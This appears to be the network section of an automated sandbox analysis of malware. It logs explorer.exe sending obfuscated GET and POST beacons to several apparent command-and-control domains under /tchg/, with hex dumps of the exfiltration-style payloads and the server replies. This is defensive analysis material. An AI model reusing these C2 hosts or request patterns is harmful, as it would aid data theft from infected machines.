                                                                                                                    Data Ascii: a(6L6xTV-a8muLaMXLIliBrozhpseKP~grPiS7buQg5PlJSQ9Yok_rAtFJkIKKR21Ag4PAUO5FFmPCn90DKuEo6H0hjtNrF1acZ6AzJq3X9NW4IA0W5pOUR6DyMO1UJNe6XMzBy4tjEMLuVz-KUp6IfpnS1N5Iyq_D7Jl854wpAc2gRb7(JAcdm(WqHyZoORgOd6qB9yAxh6_IWXi4_Z-qIBVnzUBNQSBYNw6Ph4Y31ATuN4O5T
                                                                                                                    May 30, 2023 11:11:22.776844025 CEST1184OUTData Raw: 68 57 51 59 42 68 6e 6e 6c 6d 34 4e 65 78 79 62 6a 33 69 6e 55 48 56 32 79 5a 73 42 39 4f 61 47 73 30 4b 71 43 69 54 78 2d 51 33 69 33 68 33 7e 4b 6a 6d 53 48 47 70 35 51 31 5f 4c 6a 50 4e 36 77 47 69 47 33 41 66 58 35 6a 5a 48 41 34 4b 78 45 58
                                                                                                                    Data Ascii: hWQYBhnnlm4Nexybj3inUHV2yZsB9OaGs0KqCiTx-Q3i3h3~KjmSHGp5Q1_LjPN6wGiG3AfX5jZHA4KxEXoLIM3qit2EIuzDJ(TWNf2eGO7TzS70l1viyonw_8otXL-9DLZclxaa20602pMekxYEdUMDs2x7t(Eq_Og5IP37WBJTHr3EpmGlXcWc1YgP6CZxAXaLsVKxho70IKioenjAlisro05Y3yzTssV~CDxCANf1jX9~WVj
                                                                                                                    May 30, 2023 11:11:22.776926994 CEST1192OUTData Raw: 37 49 77 35 5a 56 55 36 65 69 43 45 39 61 59 37 44 64 72 69 49 62 30 65 6d 43 52 34 4f 78 75 77 35 56 72 6c 65 54 67 59 34 39 39 37 77 35 33 57 4a 47 2d 37 42 67 64 56 35 54 6c 67 73 36 78 32 73 46 63 54 42 55 79 55 64 49 33 49 6e 37 6b 44 53 65
                                                                                                                    Data Ascii: 7Iw5ZVU6eiCE9aY7DdriIb0emCR4Oxuw5VrleTgY4997w53WJG-7BgdV5Tlgs6x2sFcTBUyUdI3In7kDSetMgk4mmlrYoLqmshuFhAEdZMKi5DqPW7s(bYDDxC3wyFm1EIAoK0R6z4ze94m3o2vAj7yf1hWuK(xJrtxxVhYlhNkY0KzQmooReIIQuFI8vJ649IKV11poM3yA4OwkgRfZ0uJ6FcV(jEy5H6EvRNA39BEmExeKneA
                                                                                                                    May 30, 2023 11:11:22.777494907 CEST1202OUTData Raw: 70 66 33 7a 6f 7e 75 6b 33 65 6c 6c 71 7e 30 32 6a 44 70 6a 65 43 5a 49 69 58 46 36 63 70 54 42 4f 72 78 63 59 58 66 70 42 6f 47 7e 57 39 50 6c 62 66 78 49 6c 37 75 62 6e 65 54 54 4e 51 39 78 4b 77 72 68 63 28 79 39 71 53 55 58 65 61 30 31 59 43
                                                                                                                    Data Ascii: pf3zo~uk3ellq~02jDpjeCZIiXF6cpTBOrxcYXfpBoG~W9PlbfxIl7ubneTTNQ9xKwrhc(y9qSUXea01YCbwFqiPtYmhNSKoEhOXsZrfOH_BvVtew1fEC7ChxZ3Y8Svc77Y4Svh4SONW7FTZNng8IbkPXSqtITo1vaxBI48y1uOe822PEqSg_XOfj4YJn5nXxCLcZOAIQ(F0Le4pKWXqB0xHybisrLgj7NUKWa4WL2m~Z9zVLfK
                                                                                                                    May 30, 2023 11:11:22.943356991 CEST1205OUTData Raw: 34 53 47 62 37 4c 61 7e 6c 7a 68 7e 2d 37 73 4e 32 31 67 4b 52 4e 65 7a 47 68 4b 59 45 66 62 65 55 68 6f 56 64 4d 66 57 73 65 5a 44 51 33 43 71 66 71 34 4a 46 44 38 54 35 76 70 68 36 6c 71 6b 72 70 36 78 30 44 33 6a 65 41 4c 79 61 54 48 56 72 47
                                                                                                                    Data Ascii: 4SGb7La~lzh~-7sN21gKRNezGhKYEfbeUhoVdMfWseZDQ3Cqfq4JFD8T5vph6lqkrp6x0D3jeALyaTHVrGXXnWnuR9opCSsSBWnjpJeu9KJDiq03IWHx-WyQBNz79misKwkgg8V1Y7hzS9m~wx3Esf0mX2Stqb2SZRNh1Wgr3aY5lhoRsNt4x64yAS2kDedxJm94rr6q1QZJl7cb7HK0B(99GHa189BlqJ2CxoDXjbm0Rv3xylA
                                                                                                                    May 30, 2023 11:11:22.943428993 CEST1212OUTData Raw: 5a 57 47 55 74 56 4e 6a 67 6c 73 37 47 6f 49 74 45 73 50 78 34 5a 32 45 72 4d 77 64 48 48 72 48 39 79 71 49 71 53 33 7e 6f 37 5a 6e 31 76 79 54 79 43 6d 4a 4b 74 55 6a 58 56 48 42 67 54 77 6a 35 68 56 43 72 7e 45 72 67 31 78 44 6d 68 6c 4e 4a 51
                                                                                                                    Data Ascii: ZWGUtVNjgls7GoItEsPx4Z2ErMwdHHrH9yqIqS3~o7Zn1vyTyCmJKtUjXVHBgTwj5hVCr~Erg1xDmhlNJQACAJIZU1RDDDGnU(r0QawlHL-l6tx~QiY2odBtSef2gUnZGySavFRFnfXrO(cbleS4Ly3Vcdn2VaSGG0BFokKqlatEfBbPAXpGTQvb4bwC5chaRHcy2bsYB76D-JqIqWO0yYcyQQz1kNxp3USodrXq3gIYRsQlWx3
                                                                                                                    May 30, 2023 11:11:22.943700075 CEST1214OUTData Raw: 5f 35 2d 35 66 79 51 49 45 6f 43 36 79 51 5f 48 53 35 51 65 66 77 50 50 76 68 31 66 5a 6c 4c 65 30 57 5f 36 72 73 30 36 5a 63 53 44 70 36 54 53 39 63 30 65 43 55 6d 53 79 74 52 32 53 79 59 66 30 6f 51 53 44 48 61 6c 77 34 42 48 41 72 6f 35 47 5a
                                                                                                                    Data Ascii: _5-5fyQIEoC6yQ_HS5QefwPPvh1fZlLe0W_6rs06ZcSDp6TS9c0eCUmSytR2SyYf0oQSDHalw4BHAro5GZJKAHrBDKbn4inKfVpUpawiITc9ltCnOltI9CNuZ4gE1RaRWOtU_srUgml9dvDlI~ZG-lfZKFmAw(ybYmHDmpgdchz4NfL2NZAWxPoCDDHH2U6KT46vBiR(YKtZBLHAfvmEqiJcCrJVa7cDkOhErY1gIJXlKCNsEme
                                                                                                                    May 30, 2023 11:11:22.943877935 CEST1223OUTData Raw: 4e 6f 6c 51 47 7e 42 66 59 5a 6c 54 47 6d 58 67 39 4f 4b 31 72 65 34 56 50 35 66 30 71 36 4f 31 6d 68 35 31 4f 54 2d 57 79 42 6c 28 4c 56 6b 33 33 36 34 67 5a 56 6a 58 36 62 56 42 39 5a 61 64 50 4a 4d 6b 4c 6b 2d 65 76 31 6d 65 56 51 6f 68 4b 70
                                                                                                                    Data Ascii: NolQG~BfYZlTGmXg9OK1re4VP5f0q6O1mh51OT-WyBl(LVk3364gZVjX6bVB9ZadPJMkLk-ev1meVQohKpKvxU4csxos62pCFcQVtUY4RXaTckoUMo4IiUA~PKa0n5LYA0mBgCIjnnVkI(dBGMT066U7qBre3hyiJpzReQRF8Lh0YGuplh4oX79qODTeuWpFpgC9GFPClIf5Vz5TRu5foJBrcWTmUndXRF9g96foiwhXxy9eeHT
                                                                                                                    May 30, 2023 11:11:22.944046021 CEST1224OUTData Raw: 74 39 64 69 69 72 41 75 63 4b 4b 73 39 67 73 42 31 50 37 77 6e 54 4f 7a 4b 6c 61 31 34 67 42 4f 6a 36 4d 33 31 44 7a 4e 39 6e 4a 41 57 51 34 64 6b 66 45 66 6c 57 59 47 73 37 62 6d 54 70 5f 47 43 6b 4e 5a 44 36 68 68 6a 4b 6c 69 30 6f 6a 54 43 67
                                                                                                                    Data Ascii: t9diirAucKKs9gsB1P7wnTOzKla14gBOj6M31DzN9nJAWQ4dkfEflWYGs7bmTp_GCkNZD6hhjKli0ojTCgLT3gJTtPmnapv0Wc5wjRkE_exj17nwh~BvRxVjxreUnjfZKL9XDO9WMRu7-2bi_kZiLTYXQZ58yfi08RFiZWfS6ESr0wJrOZI(Yu7PNUOigidEcC95NepAFlZn6NUx8TUnUJESbd78qMyDl64~xUHE3nnl8GJp4Rm
                                                                                                                    May 30, 2023 11:11:22.944206953 CEST1226OUTData Raw: 42 46 56 62 45 62 49 63 66 6d 56 6e 5f 32 67 54 79 4b 33 72 35 53 51 79 6b 73 79 65 42 42 69 69 51 39 46 63 48 7e 36 67 38 53 4f 36 47 51 76 6f 41 55 50 28 74 6e 4c 4e 72 56 52 75 33 44 67 38 4b 67 4e 54 55 72 65 56 39 69 4e 37 47 6b 59 56 51 56
                                                                                                                    Data Ascii: BFVbEbIcfmVn_2gTyK3r5SQyksyeBBiiQ9FcH~6g8SO6GQvoAUP(tnLNrVRu3Dg8KgNTUreV9iN7GkYVQVgys7Y4Nhq7Wd4xMS-j5xbcgH9dKkCKXetVmLsmNSODfObhYKIfteXhO~e88imnGY0pTYqmC7n9Dl4ht4MFez7q9OKJcv3TLDI9bny9DTYQgfD4jQldJAJHvGmnxeoP3nlD_ONU9WA0WFMG3bL23AafgL7Y0zIfPgh
                                                                                                                    May 30, 2023 11:11:23.113339901 CEST1228INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:11:22 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:11:23.113414049 CEST1228INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    62192.168.11.2049821162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:25.296351910 CEST1228OUTGET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:11:25.465282917 CEST1230INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:11:24 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:11:25.465372086 CEST1230INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    63192.168.11.2049822172.67.153.16380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:33.528538942 CEST1231OUTGET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.1win-legal1.top
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:11:33.600084066 CEST1232INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 30 May 2023 09:11:33 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/7.4.29
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://1win-legal1.top/tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5vcXvJQ%2BXzgkna2qqypBhl%2FImjvyEwyL%2F34%2BVn3kDfGwguwTSO5Ocd5rhCzo%2B6uvoYNPaHoRGevspwOlE1Qc3OABDBeCEaYuDdxniHCdFdSYDu8zGKEoUnQBtt6jDEomK8h9qoSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 7cf5d9b29ea48fc5-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    64192.168.11.2049823109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:11:38.686954975 CEST1233OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4c 5f 71 71 44 36 4a 50 34 79 49 61 38 7a 59 50 64 59 78 46 54 70 57 48 38 70 71 47 74 4d 4c 6c 4c 76 57 38 6b 6a 28 51 49 5a 33 76 78 36 38 33 34 6c 56 74 37 36 4f 59 6d 6d 76 56 30 61 44 56 33 45 57 48 45 70 73 4a 34 51 7e 36 4b 36 72 32 42 59 63 6e 55 63 57 72 72 6e 31 33 54 52 5a 55 56 57 38 65 74 47 53 53 66 31 55 32 4d 32 56 46 36 38 42 4f 64 52 77 41 67 63 7a 30 4a 79 4f 30 7e 75 6b 33 6e 61 6a 68 74 4c 64 63 61 37 33 4c 6b 59 62 49 57 69 38 73 66 4c 72 73 53 7a 56 75 78 53 6c 76 62 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpL_qqD6JP4yIa8zYPdYxFTpWH8pqGtMLlLvW8kj(QIZ3vx6834lVt76OYmmvV0aDV3EWHEpsJ4Q~6K6r2BYcnUcWrrn13TRZUVW8etGSSf1U2M2VF68BOdRwAgcz0JyO0~uk3najhtLdca73LkYbIWi8sfLrsSzVuxSlvbw).
                                                                                                                    May 30, 2023 11:11:38.764075041 CEST1233INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:11:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    65192.168.11.2049824109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
